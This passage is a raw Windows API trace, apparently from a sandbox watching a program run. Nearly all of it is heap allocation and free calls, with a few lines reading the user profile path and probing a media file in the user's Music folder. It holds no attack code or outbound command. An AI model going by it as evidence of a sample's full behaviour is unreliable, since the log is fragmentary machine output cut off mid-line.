1 [0252.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0252.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0252.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0252.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0252.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0252.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0252.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0252.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1438 [0252.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0252.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0252.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0252.732] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0252.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0252.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0252.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaac0 [0252.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0252.732] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0252.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0252.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0252.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0252.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0252.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0252.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0252.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0252.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x2420888 [0252.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0252.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0252.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0252.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0252.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1938 [0252.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0252.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0252.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa808 [0252.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0252.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0252.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0252.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0252.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0252.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0252.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0252.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0252.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0252.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0252.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0252.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0252.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0252.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0252.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0252.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0252.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0252.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0252.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0252.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0252.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0252.737] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0252.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0252.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0252.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0252.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0252.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.737] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0252.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0252.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0252.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0252.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0252.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.738] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.738] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0252.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0252.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0252.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0252.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0252.738] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0252.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0252.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0252.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0252.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0252.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0252.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0252.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0252.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.740] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 1 [0252.740] TranslateMessage (lpMsg=0x8bf710) returned 0 [0252.740] DispatchMessageW (lpMsg=0x8bf710) returned 0x0 [0252.740] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0252.740] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0252.741] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0252.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0252.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0252.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0252.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0252.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0252.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.742] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0252.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0252.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0252.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0252.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.743] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Rk60-o366.m4a", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaa18e10, ftCreationTime.dwHighDateTime=0x1d4cab5, ftLastAccessTime.dwLowDateTime=0xcece11b0, ftLastAccessTime.dwHighDateTime=0x1d4d08b, ftLastWriteTime.dwLowDateTime=0xcece11b0, ftLastWriteTime.dwHighDateTime=0x1d4d08b, nFileSizeHigh=0x0, nFileSizeLow=0x14980, dwReserved0=0xc20530, dwReserved1=0xd606, cFileName="Rk60-o366.m4a", cAlternateFileName="RK60-O~1.M4A")) returned 0xaa57a0 [0252.743] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0252.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.744] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0252.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0252.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0252.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 